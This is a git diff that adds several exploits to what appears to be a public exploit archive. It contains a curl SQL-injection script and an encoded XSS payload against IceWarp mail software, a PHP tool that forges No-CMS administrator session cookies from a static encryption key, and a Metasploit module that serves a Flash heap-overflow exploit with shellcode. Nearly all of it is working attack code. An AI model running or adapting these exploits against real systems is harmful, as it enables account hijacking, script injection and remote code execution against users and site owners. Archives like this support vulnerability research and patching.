+else
+    sql="1=0)/*"
+fi
+curl --silent -d '<iq sid="'$sid'" type="get" format="json">
+  <query xmlns="webmail:iq:items">
+    <account uid="'$uid'">
+      <folder uid="Files">
+        <item><values><evntitle></evntitle></values>
+          <filter><offset></offset><limit></limit>
+            <order_by>'"$orderby"'</order_by>
+            <sql>'"$sql"'</sql>
+          </filter>
+        </item>
+      </folder>
+    </account>
+  </query>
+</iq>' https://example.com/webmail/server/webmail.php | \
+perl -pe 's/{/\n/g' | grep "result::" | \
+sed -e 's/^"VALUE":"result:://' -e 's/"}]}],"ATTRIBUTES":$//'
+
diff --git a/platforms/php/webapps/32969.txt b/platforms/php/webapps/32969.txt
new file mode 100755
index 000000000..49e9c1db7
--- /dev/null
+++ b/platforms/php/webapps/32969.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/34823/info
+
+IceWarp Merak Mail Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks.
+
+<img src=&#x26;&#x23;&#x78;&#x36;&#x61;&#x3b;&#x26;&#x23;&#x78;&#x36; &#x31;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x36;&#x3b;&#x26;&#x23;&#x78; &#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x33;&#x3b;&#x26;&#x23; &#x78;&#x36;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26; &#x23;&#x78;&#x36;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x30;&#x3b; &#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x61; &#x3b;&#x26;&#x23;&#x78;&#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x36; &#x63;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x35;&#x3b;&#x26;&#x23;&#x78; &#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23; &#x78;&#x32;&#x38;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x34;&#x3b;&#x26; &#x23;&#x78;&#x33;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x39;&#x3b;> 
\ No newline at end of file
diff --git a/platforms/php/webapps/32976.php b/platforms/php/webapps/32976.php
new file mode 100755
index 000000000..d740156d9
--- /dev/null
+++ b/platforms/php/webapps/32976.php
@@ -0,0 +1,282 @@
+<?php
+/*
+* 
+* Static encryption_key of No-CMS lead to Session Array Injection in order to
+* hijack administrator account then you will be able for upload php files to
+* server via theme/module upload.
+* 
+* This exploit generates cookie for administrator access from non-privileges cookie.
+*  
+* Full analysis can be found following link.
+* http://www.mehmetince.net/codeigniter-based-no-cms-admin-account-hijacking-rce-via-static-encryption-key/
+* 
+* TIMELINE
+* 
+* Apr 21, 2014 at 20:17 PM = Vulnerability found.
+* Apr 22, 2014 at 1:27 AM = First contact with no-cms developers.
+* Apr 22, 2014 at 1:31 AM = Response from no-cms developer.
+* Apr 22, 2014 at 2:29AM = Vulnerability confirmed by developers.
+* Apr 22, 2014 at 04:37 = Vulnerability has been patch via following commit.
+* https://github.com/goFrendiAsgard/No-CMS/commit/39d6ed327330e94b7a76a04042665dd13f2162bd
+*/
+define('KEY', 'namidanoregret');
+define('KEYWORD', 'session_id');
+
+function log_message($type = 'debug', $str){
+    echo PHP_EOL."[".$type."] ".$str;
+}
+function show_error($str){
+    echo PHP_EOL."[error] ".$str.PHP_EOL;
+    exit(0);
+}
+function _print($str){
+    log_message("info", $str.PHP_EOL);
+}
+class CI_Encrypt {
+    public $encryption_key		= '';
+    protected $_hash_type		= 'sha1';
+    protected $_mcrypt_exists	= FALSE;
+    protected $_mcrypt_cipher;
+    protected $_mcrypt_mode;
+    public function __construct()
+    {
+        $this->_mcrypt_exists = function_exists('mcrypt_encrypt');
+        log_message('debug', 'Encrypt Class Initialized');
+    }
+    public function get_key($key = '')
+    {
+        return md5($this->encryption_key);
+    }
+    public function set_key($key = '')
+    {
+        $this->encryption_key = $key;
+        return $this;
+    }
+    public function encode_from_legacy($string, $legacy_mode = MCRYPT_MODE_ECB, $key = '')
+    {
+        if ($this->_mcrypt_exists === FALSE)
+        {
+            log_message('error', 'Encoding from legacy is available only when Mcrypt is in use.');
+            return FALSE;
+        }
+        elseif (preg_match('/[^a-zA-Z0-9\/\+=]/', $string))
+        {
+            return FALSE;
+        }
+        $current_mode = $this->_get_mode();
+        $this->set_mode($legacy_mode);
+
+        $key = $this->get_key($key);
+        $dec = base64_decode($string);
+        if (($dec = $this->mcrypt_decode($dec, $key)) === FALSE)
+        {
+            $this->set_mode($current_mode);
+            return FALSE;
+        }
+        $dec = $this->_xor_decode($dec, $key);
+        $this->set_mode($current_mode);
+        return base64_encode($this->mcrypt_encode($dec, $key));
+    }
+    public function _xor_encode($string, $key = '')
+    {
+        if($key === '')
+            $key = $this->get_key();
+        $rand = '';
+        do
+        {
+            $rand .= mt_rand();
+        }
+        while (strlen($rand) < 32);
+        $rand = $this->hash($rand);
+        $enc = '';
+        for ($i = 0, $ls = strlen($string), $lr = strlen($rand); $i < $ls; $i++)
+        {
+            $enc .= $rand[($i % $lr)].($rand[($i % $lr)] ^ $string[$i]);
+        }
+        return $this->_xor_merge($enc, $key);
+    }
+    public function _xor_decode($string, $key = '')
+    {
+        if($key === '')
+            $key = $this->get_key();
+        $string = $this->_xor_merge($string, $key);
+
+        $dec = '';
+        for ($i = 0, $l = strlen($string); $i < $l; $i++)
+        {
+            $dec .= ($string[$i++] ^ $string[$i]);
+        }
+        return $dec;
+    }
+    protected function _xor_merge($string, $key)
+    {
+        $hash = $this->hash($key);
+        $str = '';
+        for ($i = 0, $ls = strlen($string), $lh = strlen($hash); $i < $ls; $i++)
+        {
+            $str .= $string[$i] ^ $hash[($i % $lh)];
+        }
+        return $str;
+    }
+    public function mcrypt_encode($data, $key = '')
+    {
+        if($key === '')
+            $key = $this->get_key();
+        $init_size = mcrypt_get_iv_size($this->_get_cipher(), $this->_get_mode());
+        $init_vect = mcrypt_create_iv($init_size, MCRYPT_RAND);
+        return $this->_add_cipher_noise($init_vect.mcrypt_encrypt($this->_get_cipher(), $key, $data, $this->_get_mode(), $init_vect), $key);
+    }
+    public function mcrypt_decode($data, $key = '')
+    {
+        if($key === '')
+            $key = $this->get_key();
+        $data = $this->_remove_cipher_noise($data, $key);
+        $init_size = mcrypt_get_iv_size($this->_get_cipher(), $this->_get_mode());
+
+        if ($init_size > strlen($data))
+        {
+            return FALSE;
+        }
+
+        $init_vect = substr($data, 0, $init_size);
+        $data = substr($data, $init_size);
+        return rtrim(mcrypt_decrypt($this->_get_cipher(), $key, $data, $this->_get_mode(), $init_vect), "\0");
+    }
+    protected function _add_cipher_noise($data, $key)
+    {
+        $key = $this->hash($key);
+        $str = '';
+        for ($i = 0, $j = 0, $ld = strlen($data), $lk = strlen($key); $i < $ld; ++$i, ++$j)
+        {
+            if ($j >= $lk)
+            {
+                $j = 0;
+            }
+            $str .= chr((ord($data[$i]) + ord($key[$j])) % 256);
+        }
+        return $str;
+    }
+    protected function _remove_cipher_noise($data, $key)
+    {
+        $key = $this->hash($key);
+        $str = '';
+        for ($i = 0, $j = 0, $ld = strlen($data), $lk = strlen($key); $i < $ld; ++$i, ++$j)
+        {
+            if ($j >= $lk)
+            {
+                $j = 0;
+            }
+            $temp = ord($data[$i]) - ord($key[$j]);
+            if ($temp < 0)
+            {
+                $temp += 256;
+            }
+            $str .= chr($temp);
+        }
+        return $str;
+    }
+    public function set_cipher($cipher)
+    {
+        $this->_mcrypt_cipher = $cipher;
+        return $this;
+    }
+    public function set_mode($mode)
+    {
+        $this->_mcrypt_mode = $mode;
+        return $this;
+    }
+    protected function _get_cipher()
+    {
+        if ($this->_mcrypt_cipher === NULL)
+        {
+            return $this->_mcrypt_cipher = MCRYPT_RIJNDAEL_256;
+        }
+        return $this->_mcrypt_cipher;
+    }
+    protected function _get_mode()
+    {
+        if ($this->_mcrypt_mode === NULL)
+        {
+            return $this->_mcrypt_mode = MCRYPT_MODE_CBC;
+        }
+        return $this->_mcrypt_mode;
+    }
+    public function set_hash($type = 'sha1')
+    {
+        $this->_hash_type = in_array($type, hash_algos()) ? $type : 'sha1';
+    }
+    public function hash($str)
+    {
+        return hash($this->_hash_type, $str);
+    }
+
+}
+
+$encryption = new CI_Encrypt();
+$encryption->set_key(KEY);
+
+// WRITE YOUR OWN COOKIE HERE! 
+$cookie = rawurldecode("DZyb3lI68zh+RBNg8C4M03TEJhMR4BBMzNWA1YUampWQ6UKaiUhG48rwkdfIs9DJYNQc8pZDniflInnUrQz1FbRxueQ3NLCahBBmrTuw8Ib7OL7ycm/IbuR81WEVrWpYOnQ4Z57/w21OCyVw42TjSkXkfWfN67veJr5630eTBA03vRbvLunZ9RLEuElqNrJu/H63yibCv8fyRWNnKs56i5OuU6Dso11O49k4fhxd008WTvsGliLxiErCkWwYfGfcjUA3V2Mh9mkrLk0YEKIbt3hbNXhAnGhIVIVJURhnmibqEFUacB1gP1GnbP2fQy3NpJt317n/3/sH+jH4lM+53IY1HOJh7n/J6RU9jqMr1hdeslDxFaV7SCuB4vPuO7SScec8063aae4808b195d818d86fda1d280ebb06bd");
+
+$len = strlen($cookie) - 40;
+
+if ($len < 0)
+{
+    show_error('The session cookie was not signed.');
+}
+// Check cookie authentication
+$hmac	 = substr($cookie, $len);
+$session = substr($cookie, 0, $len);
+
+if ($hmac !== hash_hmac('sha1', $session, KEY))
+{
+    show_error('The session cookie data did not match what was expected.');
+}
+
+// Detect target encryption method and Decrypt session
+$_mcrypt = $encryption->mcrypt_decode(base64_decode($session));
+$_xor = $encryption->_xor_decode(base64_decode($session));
+$method = '';
+$plain = '';
+
+if (strpos($_mcrypt, KEYWORD) !== false) {
+    _print("Encryption method is mcrypt!");
+    $method = 'm';
+    $plain = $_mcrypt;
+} else if (strpos($_xor, KEYWORD) !== false) {
+    _print("Encryption method is xor!");
+    $method = 'x';
+    $plain = $_xor;
+} else {
+    show_error("something went wrong.");
+}
+
+// Unserialize session string in order to create session array.
+$session = unserialize($plain);
+_print("Current Session Array :");
+print_r($session).PHP_EOL;
+
+// Add extra fields into it
+$session['cms_user_name'] = 'admin';
+$session['cms_user_id'] = 1;
+
+// Print out payload string.
+_print("Payload appended Session Array :");
+print_r($session).PHP_EOL;
+
+// Serialize it
+$session = serialize($session);
+
+
+// Encrypt it with same key.
+if ($method === 'm')
+    $payload = base64_encode($encryption->mcrypt_encode($session));
+if ($method === 'x')
+    $payload = base64_encode($encryption->_xor_encode($session));
+
+// Calculation of hmac to add it end of the encrypted session string.
+$payload .= hash_hmac('sha1', $payload, KEY);
+
+_print("New Cookie");
+_print($payload);
+_print("Use Tamper Data and change cookie then push F5!");
diff --git a/platforms/windows/remote/32959.rb b/platforms/windows/remote/32959.rb
new file mode 100755
index 000000000..31b98fd12
--- /dev/null
+++ b/platforms/windows/remote/32959.rb
@@ -0,0 +1,121 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Adobe Flash Player Regular Expression Heap Overflow",
+      'Description'    => %q{
+        This module exploits a vulnerability found in the ActiveX component of Adobe
+        Flash Player before 11.5.502.149. By supplying a specially crafted swf file
+        with special regex value, it is possible to trigger an memory corruption, which
+        results in remote code execution under the context of the user, as exploited in
+        the wild in February 2013. This module has been tested successfully with Adobe
+        Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before
+        MS13-063, since it takes advantage of a predictable SharedUserData in order to
+        leak ntdll and bypass ASLR.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown',                   # malware sample
+          'Boris "dukeBarman" Ryutin', # msf exploit
+          'juan vazquez'               # ActionScript deobfuscation and cleaning
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-0634' ],
+          [ 'OSVDB', '89936'],
+          [ 'BID', '57787'],
+          [ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],
+          [ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],
+          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],
+          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],
+          [ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]
+        ],
+      'Payload'        =>
+        {
+          'Space' => 1024,
+          'DisableNops' => true
+        },
+      'DefaultOptions'  =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+          'Retries'              => false
+        },
+      'Platform'       => 'win',
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :clsid   => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
+          :method  => "LoadMovie",
+          :os_name => Msf::OperatingSystems::WINDOWS,
+          :ua_name => Msf::HttpClients::IE,
+          :flash   => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Feb 8 2013",
+      'DefaultTarget'  => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+    super
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status("Sending SWF...")
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status("Sending HTML...")
+    tag = retrieve_tag(cli, request)
+    profile = get_profile(tag)
+    profile[:tried] = false unless profile.nil? # to allow request the swf
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    shellcode = get_payload(cli, target_info).unpack("H*")[0]
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="his=<%=shellcode%>" />
+    <param name="Play" value="true" />
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "exploit.swf" )
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+
+end
\ No newline at end of file